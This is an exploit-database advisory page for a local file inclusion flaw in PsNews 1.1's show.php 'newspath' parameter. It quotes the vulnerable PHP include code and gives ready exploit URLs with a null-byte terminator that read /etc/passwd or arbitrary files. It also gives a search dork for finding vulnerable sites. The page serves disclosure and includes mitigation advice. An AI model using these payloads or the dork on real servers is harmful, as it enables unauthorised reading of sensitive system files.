header-logo
Suggest Exploit
vendor:
PsNews
by:
irk4z@yahoo.pl
N/A
CVSS
MEDIUM
Local File Inclusion
22
CWE
Product Name: PsNews
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PsNews 1.1 (show.php newspath) Local File Inclusion

The vulnerability allows an attacker to include local files on the server by manipulating the 'newspath' parameter in the 'show.php' script. By injecting a file path, an attacker can potentially read sensitive files, such as the '/etc/passwd' file. The vulnerability affects PsNews version 1.1.

Mitigation:

To mitigate the vulnerability, it is recommended to sanitize user input and validate the 'newspath' parameter before including any files.
Source

Exploit-DB raw data:

#                                      o      [bug]     /"*._         _        #
#                 .                     .    .      .-*'`    `*-.._.-'/        #
#                                   o       o     < * ))     ,       (         #
#                            .           o          `*-._`._(__.--*"`.\        #
#                                                                              #
# vuln.: PsNews 1.1 (show.php newspath) Local File Inclusion                   #
# author: irk4z@yahoo.pl                                                       #
# download:                                                                    #
#   http://www.strefaphp.net/index.php?page=download&what=download&fid=12      #
# dork: "Powered by PsNews" ;]                                                 #

/news/show.php:
...
 if(eregi("://", $newspath)){
 	die("Nieautoryzowany dostęp!");
 }
 if(!isset($newspath)){
	 $newspath = "news";
 }
 include("$newspath/functions.php");
...

# exploit:

 http://[site]/[path]/news/show.php?newspath=/etc/passwd%00
 http://[site]/[path]/news/show.php?newspath=[file]%00


# greetz: cOndemned, DooMRiderZ vx team (great zin :D), polish underground :*

# milw0rm.com [2007-07-12]